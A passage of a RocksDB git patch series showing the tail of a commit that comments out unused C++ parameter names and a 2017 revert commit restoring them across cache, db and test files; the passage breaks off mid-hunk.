{{"TransactionTest::ExpirableTransactionDataRace:1"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "TransactionTest::ExpirableTransactionDataRace:1", [&](void* arg) { + "TransactionTest::ExpirableTransactionDataRace:1", [&](void* /*arg*/) { WriteOptions write_options; TransactionOptions txn_options; diff --git a/utilities/ttl/ttl_test.cc b/utilities/ttl/ttl_test.cc index 586d0ce1f6c..7aa411b6183 100644 --- a/utilities/ttl/ttl_test.cc +++ b/utilities/ttl/ttl_test.cc @@ -295,8 +295,8 @@ class TtlTest : public testing::Test { // Keeps key if it is in [kSampleSize_/3, 2*kSampleSize_/3), // Change value if it is in [2*kSampleSize_/3, kSampleSize_) // Eg. kSampleSize_=6. Drop:key0-1...Keep:key2-3...Change:key4-5... - virtual bool Filter(int level, const Slice& key, - const Slice& value, std::string* new_value, + virtual bool Filter(int /*level*/, const Slice& key, const Slice& /*value*/, + std::string* new_value, bool* value_changed) const override { assert(new_value != nullptr); @@ -345,7 +345,7 @@ class TtlTest : public testing::Test { } virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& context) override { + const CompactionFilter::Context& /*context*/) override { return std::unique_ptr( new TestFilter(kSampleSize_, kNewValue_)); } diff --git a/utilities/write_batch_with_index/write_batch_with_index_test.cc b/utilities/write_batch_with_index/write_batch_with_index_test.cc index 5b1250a6431..105f7517d29 100644 --- a/utilities/write_batch_with_index/write_batch_with_index_test.cc +++ b/utilities/write_batch_with_index/write_batch_with_index_test.cc @@ -63,7 +63,7 @@ struct TestHandler : public WriteBatch::Handler { seen[column_family_id].push_back(e); return Status::OK(); } - virtual void LogData(const Slice& blob) {} + virtual void LogData(const Slice& /*blob*/) {} virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) { Entry e; e.key = key.ToString(); From 72502cf2270db7323d447cc7a504dbea251d432a Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Fri, 21 Jul 2017 18:13:59 -0700 Subject: [PATCH 026/205] Revert "comment out unused parameters" Summary: This reverts the previous commit 1d7048c5985e60be8e356663ec3cb6d020adb44d, which broke the build. Did a `git revert 1d7048c`. Closes https://github.com/facebook/rocksdb/pull/2627 Differential Revision: D5476473 Pulled By: sagar0 fbshipit-source-id: 4756ff5c0dfc88c17eceb00e02c36176de728d06 --- cache/cache_test.cc | 6 +- cache/clock_cache.cc | 2 +- cache/sharded_cache.cc | 2 +- db/builder.cc | 8 +- db/c.cc | 16 +- db/column_family_test.cc | 51 +++--- db/compact_files_test.cc | 9 +- db/compacted_db_impl.h | 45 +++-- db/compaction_iterator.cc | 2 +- db/compaction_iterator.h | 2 +- db/compaction_iterator_test.cc | 29 ++-- db/compaction_job_stats_test.cc | 10 +- db/compaction_picker.cc | 9 +- db/compaction_picker.h | 26 ++- db/compaction_picker_test.cc | 4 +- db/comparator_db_test.cc | 18 +- db/db_block_cache_test.cc | 2 +- db/db_bloom_filter_test.cc | 4 +- db/db_compaction_filter_test.cc | 48 +++--- db/db_compaction_test.cc | 46 ++--- db/db_dynamic_level_test.cc | 4 +- db/db_flush_test.cc | 4 +- db/db_impl.cc | 27 ++- db/db_impl_compaction_flush.cc | 2 +- db/db_impl_readonly.cc | 2 +- db/db_impl_readonly.h | 59 ++++--- db/db_impl_write.cc | 2 +- db/db_iter_test.cc | 6 +- db/db_iterator_test.cc | 6 +- db/db_memtable_test.cc | 2 +- db/db_properties_test.cc | 12 +- db/db_sst_test.cc | 13 +- db/db_tailing_iter_test.cc | 6 +- db/db_test.cc | 163 +++++++++--------- db/db_test2.cc | 23 +-- db/db_test_util.cc | 11 +- db/db_test_util.h | 2 +- db/db_universal_compaction_test.cc | 50 +++--- db/deletefile_test.cc | 2 +- db/external_sst_file_test.cc | 15 +- db/fault_injection_test.cc | 4 +- db/file_indexer_test.cc | 6 +- db/forward_iterator.cc | 2 +- db/forward_iterator.h | 2 +- db/internal_stats.cc | 117 ++++++------- db/listener_test.cc | 17 +- db/malloc_stats.cc | 2 +- db/manual_compaction_test.cc | 6 +- db/memtable_list.cc | 4 +- db/merge_test.cc | 2 +- db/plain_table_db_test.cc | 2 +- db/prefix_test.cc | 6 +- db/table_cache.cc | 4 +- db/table_properties_collector.cc | 4 +- db/table_properties_collector.h | 2 +- db/table_properties_collector_test.cc | 19 +- db/version_builder.cc | 2 +- db/version_edit.cc | 2 +- db/version_set.cc | 6 +- db/version_set.h | 2 +- db/version_set_test.cc | 4 +- db/wal_manager_test.cc | 2 +- db/write_batch.cc | 6 +- db/write_batch_test.cc | 32 ++-- db/write_callback_test.cc | 6 +- db/write_thread.cc | 3 +- env/env_encryption.cc | 14 +- env/env_hdfs.cc | 10 +- env/env_test.cc | 21 +-- env/io_posix.cc | 4 +- env/io_posix.h | 2 +- env/mock_env.cc | 14 +- hdfs/env_hdfs.h | 101 +++++------ include/rocksdb/cache.h | 3 +- include/rocksdb/compaction_filter.h | 12 +- include/rocksdb/db.h | 2 +- include/rocksdb/env.h | 51 +++--- include/rocksdb/filter_policy.h | 5 +- include/rocksdb/iterator.h | 2 +- include/rocksdb/listener.h | 4 +- include/rocksdb/memtablerep.h | 8 +- include/rocksdb/merge_operator.h | 15 +- include/rocksdb/rate_limiter.h | 2 +- include/rocksdb/slice.h | 2 +- include/rocksdb/slice_transform.h | 4 +- include/rocksdb/statistics.h | 2 +- include/rocksdb/utilities/geo_db.h | 2 +- .../utilities/optimistic_transaction_db.h | 2 +- include/rocksdb/utilities/transaction.h | 6 +- include/rocksdb/wal_filter.h | 18 +- include/rocksdb/write_batch.h | 11 +- memtable/hash_cuckoo_rep.cc | 6 +- memtable/hash_linklist_rep.cc | 14 +- memtable/hash_skiplist_rep.cc | 14 +- memtable/skiplistrep.cc | 2 +- memtable/vectorrep.cc | 6 +- options/options_helper.cc | 2 +- options/options_parser.cc | 2 +- port/port_posix.cc | 2 +- port/stack_trace.cc | 2 +- table/adaptive_table_factory.cc | 2 +- table/adaptive_table_factory.h | 5 +- table/block_based_filter_block.cc | 10 +- table/block_based_table_builder.cc | 6 +- table/block_based_table_factory.cc | 3 +- table/block_based_table_reader.cc | 18 +- table/block_test.cc | 2 +- table/cuckoo_table_builder_test.cc | 2 +- table/cuckoo_table_factory.cc | 2 +- table/cuckoo_table_factory.h | 5 +- table/cuckoo_table_reader.cc | 11 +- table/cuckoo_table_reader.h | 2 +- table/cuckoo_table_reader_test.cc | 2 +- table/full_filter_block.cc | 14 +- table/full_filter_block.h | 2 +- table/get_context.cc | 2 +- table/index_builder.h | 4 +- table/internal_iterator.h | 5 +- table/iterator.cc | 8 +- table/mock_table.cc | 16 +- table/mock_table.h | 6 +- table/partitioned_filter_block.cc | 2 +- table/partitioned_filter_block_test.cc | 4 +- table/plain_table_factory.cc | 2 +- table/plain_table_factory.h | 5 +- table/plain_table_key_coding.cc | 2 +- table/plain_table_reader.cc | 10 +- table/sst_file_writer_collectors.h | 6 +- table/table_reader.h | 6 +- table/table_test.cc | 53 +++--- third-party/fbson/FbsonDocument.h | 2 +- tools/db_bench_tool.cc | 16 +- tools/ldb_cmd.cc | 40 ++--- tools/ldb_tool.cc | 2 +- tools/sst_dump_tool.cc | 6 +- util/compression.h | 22 ++- util/delete_scheduler_test.cc | 17 +- util/file_reader_writer_test.cc | 36 ++-- util/slice.cc | 8 +- util/testutil.cc | 6 +- util/testutil.h | 74 ++++---- util/thread_local_test.cc | 2 +- utilities/backupable/backupable_db.cc | 2 +- utilities/backupable/backupable_db_test.cc | 11 +- utilities/blob_db/blob_db.h | 6 +- utilities/blob_db/blob_db_impl.cc | 13 +- utilities/blob_db/blob_log_reader.cc | 2 +- utilities/checkpoint/checkpoint_impl.cc | 4 +- utilities/checkpoint/checkpoint_test.cc | 2 +- utilities/col_buf_decoder.h | 2 +- .../remove_emptyvalue_compactionfilter.cc | 11 +- utilities/document/document_db.cc | 21 ++- utilities/merge_operators/max.cc | 8 +- utilities/merge_operators/put.cc | 27 +-- .../string_append/stringappend.cc | 8 +- .../string_append/stringappend2.cc | 8 +- utilities/merge_operators/uint64add.cc | 6 +- utilities/object_registry_test.cc | 13 +- utilities/options/options_util_test.cc | 34 ++-- .../persistent_cache/block_cache_tier_file.cc | 2 +- .../persistent_cache/block_cache_tier_file.h | 6 +- utilities/persistent_cache/hash_table_test.cc | 4 +- .../persistent_cache/persistent_cache_test.h | 4 +- .../persistent_cache/persistent_cache_tier.cc | 4 +- .../persistent_cache/volatile_tier_impl.cc | 2 +- utilities/redis/redis_list_iterator.h | 2 +- utilities/simulator_cache/sim_cache.cc | 2 +- utilities/simulator_cache/sim_cache_test.cc | 2 +- utilities/spatialdb/spatial_db.cc | 2 +- .../compact_on_deletion_collector.cc | 11 +- .../compact_on_deletion_collector.h | 2 +- .../compact_on_deletion_collector_test.cc | 2 +- .../optimistic_transaction_impl.cc | 2 +- .../optimistic_transaction_impl.h | 4 +- utilities/transactions/transaction_base.h | 2 +- utilities/transactions/transaction_impl.cc | 4 +- utilities/transactions/transaction_impl.h | 2 +- utilities/transactions/transaction_test.cc | 8 +- utilities/ttl/ttl_test.cc | 6 +- .../write_batch_with_index_test.cc | 2 +- 180 files changed, 1006 insertions(+), 1076 deletions(-) diff --git a/cache/cache_test.cc b/cache/cache_test.cc index 55f9cc6bb63..8e241226d9c 100644 --- a/cache/cache_test.cc +++ b/cache/cache_test.cc @@ -40,9 +40,9 @@ static int DecodeValue(void* v) { const std::string kLRU = "lru"; const std::string kClock = "clock"; -void dumbDeleter(const Slice& /*key*/, void* /*value*/) {} +void dumbDeleter(const Slice& key, void* value) {} -void eraseDeleter(const Slice& /*key*/, void* value) { +void eraseDeleter(const Slice& key, void* value) { Cache* cache = reinterpret_cast(value); cache->Erase("foo"); } @@ -470,7 +470,7 @@ class Value { }; namespace { -void deleter(const Slice& /*key*/, void* value) { +void deleter(const Slice& key, void* value) { delete static_cast(value); } } // namespace diff --git a/cache/clock_cache.cc b/cache/clock_cache.cc index d5b32f82fe5..db9d1438e22 100644 --- a/cache/clock_cache.cc +++ b/cache/clock_cache.cc @@ -581,7 +581,7 @@ Status ClockCacheShard::Insert(const Slice& key, uint32_t hash, void* value, size_t charge, void (*deleter)(const Slice& key, void* value), Cache::Handle** out_handle, - Cache::Priority /*priority*/) { + Cache::Priority priority) { CleanupContext context; HashTable::accessor accessor; char* key_data = new char[key.size()]; diff --git a/cache/sharded_cache.cc b/cache/sharded_cache.cc index 6a0a2228211..9bdea3a08e1 100644 --- a/cache/sharded_cache.cc +++ b/cache/sharded_cache.cc @@ -53,7 +53,7 @@ Status ShardedCache::Insert(const Slice& key, void* value, size_t charge, ->Insert(key, hash, value, charge, deleter, handle, priority); } -Cache::Handle* ShardedCache::Lookup(const Slice& key, Statistics* /*stats*/) { +Cache::Handle* ShardedCache::Lookup(const Slice& key, Statistics* stats) { uint32_t hash = HashSlice(key); return GetShard(Shard(hash))->Lookup(key, hash); } diff --git a/db/builder.cc b/db/builder.cc index 6c68e7c4052..6f973fdbd5b 100644 --- a/db/builder.cc +++ b/db/builder.cc @@ -61,10 +61,10 @@ TableBuilder* NewTableBuilder( Status BuildTable( const std::string& dbname, Env* env, const ImmutableCFOptions& ioptions, - const MutableCFOptions& /*mutable_cf_options*/, - const EnvOptions& env_options, TableCache* table_cache, - InternalIterator* iter, std::unique_ptr range_del_iter, - FileMetaData* meta, const InternalKeyComparator& internal_comparator, + const MutableCFOptions& mutable_cf_options, const EnvOptions& env_options, + TableCache* table_cache, InternalIterator* iter, + std::unique_ptr range_del_iter, FileMetaData* meta, + const InternalKeyComparator& internal_comparator, const std::vector>* int_tbl_prop_collector_factories, uint32_t column_family_id, const std::string& column_family_name, diff --git a/db/c.cc b/db/c.cc index a09d014ec1e..441ffade3b6 100644 --- a/db/c.cc +++ b/db/c.cc @@ -240,7 +240,7 @@ struct rocksdb_comparator_t : public Comparator { // No-ops since the C binding does not support key shortening methods. virtual void FindShortestSeparator(std::string*, const Slice&) const override {} - virtual void FindShortSuccessor(std::string* /*key*/) const override {} + virtual void FindShortSuccessor(std::string* key) const override {} }; struct rocksdb_filterpolicy_t : public FilterPolicy { @@ -355,7 +355,7 @@ struct rocksdb_mergeoperator_t : public MergeOperator { virtual bool PartialMergeMulti(const Slice& key, const std::deque& operand_list, std::string* new_value, - Logger* /*logger*/) const override { + Logger* logger) const override { size_t operand_count = operand_list.size(); std::vector operand_pointers(operand_count); std::vector operand_sizes(operand_count); @@ -2106,8 +2106,8 @@ void rocksdb_options_set_level0_stop_writes_trigger( opt->rep.level0_stop_writes_trigger = n; } -void rocksdb_options_set_max_mem_compaction_level(rocksdb_options_t* /*opt*/, - int /*n*/) {} +void rocksdb_options_set_max_mem_compaction_level(rocksdb_options_t* opt, + int n) {} void rocksdb_options_set_wal_recovery_mode(rocksdb_options_t* opt,int mode) { opt->rep.wal_recovery_mode = static_cast(mode); @@ -2171,8 +2171,8 @@ void rocksdb_options_set_manifest_preallocation_size( } // noop -void rocksdb_options_set_purge_redundant_kvs_while_flush( - rocksdb_options_t* /*opt*/, unsigned char /*v*/) {} +void rocksdb_options_set_purge_redundant_kvs_while_flush(rocksdb_options_t* opt, + unsigned char v) {} void rocksdb_options_set_use_direct_reads(rocksdb_options_t* opt, unsigned char v) { @@ -2332,7 +2332,7 @@ void rocksdb_options_set_table_cache_numshardbits( } void rocksdb_options_set_table_cache_remove_scan_count_limit( - rocksdb_options_t* /*opt*/, int /*v*/) { + rocksdb_options_t* opt, int v) { // this option is deprecated } @@ -2836,7 +2836,7 @@ rocksdb_sstfilewriter_t* rocksdb_sstfilewriter_create( rocksdb_sstfilewriter_t* rocksdb_sstfilewriter_create_with_comparator( const rocksdb_envoptions_t* env, const rocksdb_options_t* io_options, - const rocksdb_comparator_t* /*comparator*/) { + const rocksdb_comparator_t* comparator) { rocksdb_sstfilewriter_t* writer = new rocksdb_sstfilewriter_t; writer->rep = new SstFileWriter(env->rep, io_options->rep); return writer; diff --git a/db/column_family_test.cc b/db/column_family_test.cc index 440fc9930a3..88786d469d5 100644 --- a/db/column_family_test.cc +++ b/db/column_family_test.cc @@ -1168,14 +1168,13 @@ TEST_F(ColumnFamilyTest, MemtableNotSupportSnapshot) { #endif // !ROCKSDB_LITE class TestComparator : public Comparator { - int Compare(const rocksdb::Slice& /*a*/, - const rocksdb::Slice& /*b*/) const override { + int Compare(const rocksdb::Slice& a, const rocksdb::Slice& b) const override { return 0; } const char* Name() const override { return "Test"; } - void FindShortestSeparator(std::string* /*start*/, - const rocksdb::Slice& /*limit*/) const override {} - void FindShortSuccessor(std::string* /*key*/) const override {} + void FindShortestSeparator(std::string* start, + const rocksdb::Slice& limit) const override {} + void FindShortSuccessor(std::string* key) const override {} }; static TestComparator third_comparator; @@ -1347,7 +1346,7 @@ TEST_F(ColumnFamilyTest, MultipleManualCompactions) { {"ColumnFamilyTest::MultiManual:2", "ColumnFamilyTest::MultiManual:5"}, {"ColumnFamilyTest::MultiManual:2", "ColumnFamilyTest::MultiManual:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:4"); cf_1_1 = false; @@ -1440,7 +1439,7 @@ TEST_F(ColumnFamilyTest, AutomaticAndManualCompactions) { {"ColumnFamilyTest::AutoManual:2", "ColumnFamilyTest::AutoManual:5"}, {"ColumnFamilyTest::AutoManual:2", "ColumnFamilyTest::AutoManual:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { cf_1_1 = false; TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:4"); @@ -1541,7 +1540,7 @@ TEST_F(ColumnFamilyTest, ManualAndAutomaticCompactions) { {"ColumnFamilyTest::ManualAuto:5", "ColumnFamilyTest::ManualAuto:2"}, {"ColumnFamilyTest::ManualAuto:2", "ColumnFamilyTest::ManualAuto:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4"); cf_1_1 = false; @@ -1634,7 +1633,7 @@ TEST_F(ColumnFamilyTest, SameCFManualManualCompactions) { {"ColumnFamilyTest::ManualManual:1", "ColumnFamilyTest::ManualManual:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:4"); cf_1_1 = false; @@ -1732,7 +1731,7 @@ TEST_F(ColumnFamilyTest, SameCFManualAutomaticCompactions) { {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:2"}, {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4"); cf_1_1 = false; @@ -1824,7 +1823,7 @@ TEST_F(ColumnFamilyTest, SameCFManualAutomaticCompactionsLevel) { "ColumnFamilyTest::ManualAuto:3"}, {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4"); cf_1_1 = false; @@ -1927,7 +1926,7 @@ TEST_F(ColumnFamilyTest, SameCFManualAutomaticConflict) { {"ColumnFamilyTest::ManualAutoCon:1", "ColumnFamilyTest::ManualAutoCon:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:4"); cf_1_1 = false; @@ -2031,7 +2030,7 @@ TEST_F(ColumnFamilyTest, SameCFAutomaticManualCompactions) { {"CompactionPicker::CompactRange:Conflict", "ColumnFamilyTest::AutoManual:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:4"); cf_1_1 = false; @@ -2477,21 +2476,21 @@ TEST_F(ColumnFamilyTest, CreateAndDropRace) { auto main_thread_id = std::this_thread::get_id(); - rocksdb::SyncPoint::GetInstance()->SetCallBack( - "PersistRocksDBOptions:start", [&](void* /*arg*/) { - auto current_thread_id = std::this_thread::get_id(); - // If it's the main thread hitting this sync-point, then it - // will be blocked until some other thread update the test_stage. - if (main_thread_id == current_thread_id) { - test_stage = kMainThreadStartPersistingOptionsFile; - while (test_stage < kChildThreadFinishDroppingColumnFamily) { - Env::Default()->SleepForMicroseconds(100); - } - } - }); + rocksdb::SyncPoint::GetInstance()->SetCallBack("PersistRocksDBOptions:start", + [&](void* arg) { + auto current_thread_id = std::this_thread::get_id(); + // If it's the main thread hitting this sync-point, then it + // will be blocked until some other thread update the test_stage. + if (main_thread_id == current_thread_id) { + test_stage = kMainThreadStartPersistingOptionsFile; + while (test_stage < kChildThreadFinishDroppingColumnFamily) { + Env::Default()->SleepForMicroseconds(100); + } + } + }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WriteThread::EnterUnbatched:Wait", [&](void* /*arg*/) { + "WriteThread::EnterUnbatched:Wait", [&](void* arg) { // This means a thread doing DropColumnFamily() is waiting for // other thread to finish persisting options. // In such case, we update the test_stage to unblock the main thread. diff --git a/db/compact_files_test.cc b/db/compact_files_test.cc index 7f150453960..5aad6114f5e 100644 --- a/db/compact_files_test.cc +++ b/db/compact_files_test.cc @@ -37,7 +37,8 @@ class FlushedFileCollector : public EventListener { FlushedFileCollector() {} ~FlushedFileCollector() {} - virtual void OnFlushCompleted(DB* /*db*/, const FlushJobInfo& info) override { + virtual void OnFlushCompleted( + DB* db, const FlushJobInfo& info) override { std::lock_guard lock(mutex_); flushed_files_.push_back(info.file_path); } @@ -256,9 +257,9 @@ TEST_F(CompactFilesTest, CapturingPendingFiles) { TEST_F(CompactFilesTest, CompactionFilterWithGetSv) { class FilterWithGet : public CompactionFilter { public: - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { if (db_ == nullptr) { return true; } diff --git a/db/compacted_db_impl.h b/db/compacted_db_impl.h index 736002e1e52..de32f21e681 100644 --- a/db/compacted_db_impl.h +++ b/db/compacted_db_impl.h @@ -32,56 +32,55 @@ class CompactedDBImpl : public DBImpl { override; using DBImpl::Put; - virtual Status Put(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, const Slice& /*value*/) override { + virtual Status Put(const WriteOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + const Slice& value) override { return Status::NotSupported("Not supported in compacted db mode."); } using DBImpl::Merge; - virtual Status Merge(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, const Slice& /*value*/) override { + virtual Status Merge(const WriteOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + const Slice& value) override { return Status::NotSupported("Not supported in compacted db mode."); } using DBImpl::Delete; - virtual Status Delete(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/) override { + virtual Status Delete(const WriteOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key) override { return Status::NotSupported("Not supported in compacted db mode."); } - virtual Status Write(const WriteOptions& /*options*/, - WriteBatch* /*updates*/) override { + virtual Status Write(const WriteOptions& options, + WriteBatch* updates) override { return Status::NotSupported("Not supported in compacted db mode."); } using DBImpl::CompactRange; - virtual Status CompactRange(const CompactRangeOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice* /*begin*/, - const Slice* /*end*/) override { + virtual Status CompactRange(const CompactRangeOptions& options, + ColumnFamilyHandle* column_family, + const Slice* begin, const Slice* end) override { return Status::NotSupported("Not supported in compacted db mode."); } virtual Status DisableFileDeletions() override { return Status::NotSupported("Not supported in compacted db mode."); } - virtual Status EnableFileDeletions(bool /*force*/) override { + virtual Status EnableFileDeletions(bool force) override { return Status::NotSupported("Not supported in compacted db mode."); } virtual Status GetLiveFiles(std::vector&, - uint64_t* /*manifest_file_size*/, - bool /*flush_memtable*/ = true) override { + uint64_t* manifest_file_size, + bool flush_memtable = true) override { return Status::NotSupported("Not supported in compacted db mode."); } using DBImpl::Flush; - virtual Status Flush(const FlushOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/) override { + virtual Status Flush(const FlushOptions& options, + ColumnFamilyHandle* column_family) override { return Status::NotSupported("Not supported in compacted db mode."); } using DB::IngestExternalFile; virtual Status IngestExternalFile( - ColumnFamilyHandle* /*column_family*/, - const std::vector& /*external_files*/, - const IngestExternalFileOptions& /*ingestion_options*/) override { + ColumnFamilyHandle* column_family, + const std::vector& external_files, + const IngestExternalFileOptions& ingestion_options) override { return Status::NotSupported("Not supported in compacted db mode."); } diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc index 211a48def73..08ae1973409 100644 --- a/db/compaction_iterator.cc +++ b/db/compaction_iterator.cc @@ -50,7 +50,7 @@ CompactionIterator::CompactionIterator( CompactionIterator::CompactionIterator( InternalIterator* input, const Comparator* cmp, MergeHelper* merge_helper, - SequenceNumber /*last_sequence*/, std::vector* snapshots, + SequenceNumber last_sequence, std::vector* snapshots, SequenceNumber earliest_write_conflict_snapshot, Env* env, bool expect_valid_internal_key, RangeDelAggregator* range_del_agg, std::unique_ptr compaction, diff --git a/db/compaction_iterator.h b/db/compaction_iterator.h index 492e53abff0..cad23866699 100644 --- a/db/compaction_iterator.h +++ b/db/compaction_iterator.h @@ -31,7 +31,7 @@ class CompactionIterator { : compaction_(compaction) {} virtual ~CompactionProxy() = default; - virtual int level(size_t /*compaction_input_level*/ = 0) const { + virtual int level(size_t compaction_input_level = 0) const { return compaction_->level(); } virtual bool KeyNotExistsBeyondOutputLevel( diff --git a/db/compaction_iterator_test.cc b/db/compaction_iterator_test.cc index 7f2915b0aa3..b625c99ffaa 100644 --- a/db/compaction_iterator_test.cc +++ b/db/compaction_iterator_test.cc @@ -17,15 +17,15 @@ namespace rocksdb { // Expects no merging attempts. class NoMergingMergeOp : public MergeOperator { public: - bool FullMergeV2(const MergeOperationInput& /*merge_in*/, - MergeOperationOutput* /*merge_out*/) const override { + bool FullMergeV2(const MergeOperationInput& merge_in, + MergeOperationOutput* merge_out) const override { ADD_FAILURE(); return false; } - bool PartialMergeMulti(const Slice& /*key*/, - const std::deque& /*operand_list*/, - std::string* /*new_value*/, - Logger* /*logger*/) const override { + bool PartialMergeMulti(const Slice& key, + const std::deque& operand_list, + std::string* new_value, + Logger* logger) const override { ADD_FAILURE(); return false; } @@ -39,10 +39,9 @@ class NoMergingMergeOp : public MergeOperator { // Always returns Decition::kRemove. class StallingFilter : public CompactionFilter { public: - virtual Decision FilterV2(int /*level*/, const Slice& key, ValueType /*t*/, - const Slice& /*existing_value*/, - std::string* /*new_value*/, - std::string* /*skip_until*/) const override { + virtual Decision FilterV2(int level, const Slice& key, ValueType t, + const Slice& existing_value, std::string* new_value, + std::string* skip_until) const override { int k = std::atoi(key.ToString().c_str()); last_seen.store(k); while (k >= stall_at.load()) { @@ -113,7 +112,7 @@ class LoggingForwardVectorIterator : public InternalIterator { keys_.begin(); } - virtual void SeekForPrev(const Slice& /*target*/) override { assert(false); } + virtual void SeekForPrev(const Slice& target) override { assert(false); } virtual void Next() override { assert(Valid()); @@ -145,9 +144,9 @@ class FakeCompaction : public CompactionIterator::CompactionProxy { public: FakeCompaction() = default; - virtual int level(size_t /*compaction_input_level*/) const { return 0; } + virtual int level(size_t compaction_input_level) const { return 0; } virtual bool KeyNotExistsBeyondOutputLevel( - const Slice& /*user_key*/, std::vector* /*level_ptrs*/) const { + const Slice& user_key, std::vector* level_ptrs) const { return key_not_exists_beyond_output_level; } virtual bool bottommost_level() const { return false; } @@ -277,9 +276,9 @@ TEST_F(CompactionIteratorTest, RangeDeletionWithSnapshots) { TEST_F(CompactionIteratorTest, CompactionFilterSkipUntil) { class Filter : public CompactionFilter { - virtual Decision FilterV2(int /*level*/, const Slice& key, ValueType t, + virtual Decision FilterV2(int level, const Slice& key, ValueType t, const Slice& existing_value, - std::string* /*new_value*/, + std::string* new_value, std::string* skip_until) const override { std::string k = key.ToString(); std::string v = existing_value.ToString(); diff --git a/db/compaction_job_stats_test.cc b/db/compaction_job_stats_test.cc index c20c120e580..9a8372f5785 100644 --- a/db/compaction_job_stats_test.cc +++ b/db/compaction_job_stats_test.cc @@ -426,7 +426,7 @@ class CompactionJobStatsChecker : public EventListener { // Once a compaction completed, this function will verify the returned // CompactionJobInfo with the oldest CompactionJobInfo added earlier // in "expected_stats_" which has not yet being used for verification. - virtual void OnCompactionCompleted(DB* /*db*/, const CompactionJobInfo& ci) { + virtual void OnCompactionCompleted(DB *db, const CompactionJobInfo& ci) { if (verify_next_comp_io_stats_) { ASSERT_GT(ci.stats.file_write_nanos, 0); ASSERT_GT(ci.stats.file_range_sync_nanos, 0); @@ -806,7 +806,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) { stats_checker->set_verify_next_comp_io_stats(true); std::atomic first_prepare_write(true); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WritableFileWriter::Append:BeforePrepareWrite", [&](void* /*arg*/) { + "WritableFileWriter::Append:BeforePrepareWrite", [&](void* arg) { if (first_prepare_write.load()) { options.env->SleepForMicroseconds(3); first_prepare_write.store(false); @@ -815,7 +815,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) { std::atomic first_flush(true); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WritableFileWriter::Flush:BeforeAppend", [&](void* /*arg*/) { + "WritableFileWriter::Flush:BeforeAppend", [&](void* arg) { if (first_flush.load()) { options.env->SleepForMicroseconds(3); first_flush.store(false); @@ -824,7 +824,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) { std::atomic first_sync(true); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WritableFileWriter::SyncInternal:0", [&](void* /*arg*/) { + "WritableFileWriter::SyncInternal:0", [&](void* arg) { if (first_sync.load()) { options.env->SleepForMicroseconds(3); first_sync.store(false); @@ -833,7 +833,7 @@ TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) { std::atomic first_range_sync(true); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WritableFileWriter::RangeSync:0", [&](void* 